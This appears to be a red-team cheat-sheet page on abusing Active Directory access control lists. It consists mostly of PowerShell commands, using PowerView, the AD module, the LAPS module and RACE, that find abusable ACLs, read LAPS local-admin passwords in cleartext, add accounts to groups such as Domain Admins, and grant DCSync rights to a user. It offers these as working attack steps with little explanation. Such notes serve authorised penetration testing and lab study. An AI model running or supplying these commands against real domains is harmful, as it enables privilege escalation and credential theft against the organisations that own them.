ACL Abuse
ADModule
PowerView_Dev
PowerView
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get DistinguishedName
Get-ADUser -Identity USER
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
Find-InterestingDomainACL -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs
Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.
LAPS Module
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>
Can add members to the group
ADModule
PowerView_dev
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check
Get-ADGroupMember -Identity "LocalAdmins"
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
Can perform Resource Based Constrained Delegation Attack
Can reset their password without knowing the old one
Can give DCSync privs to user
RACE
PowerView3
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync
Last modified 2yr ago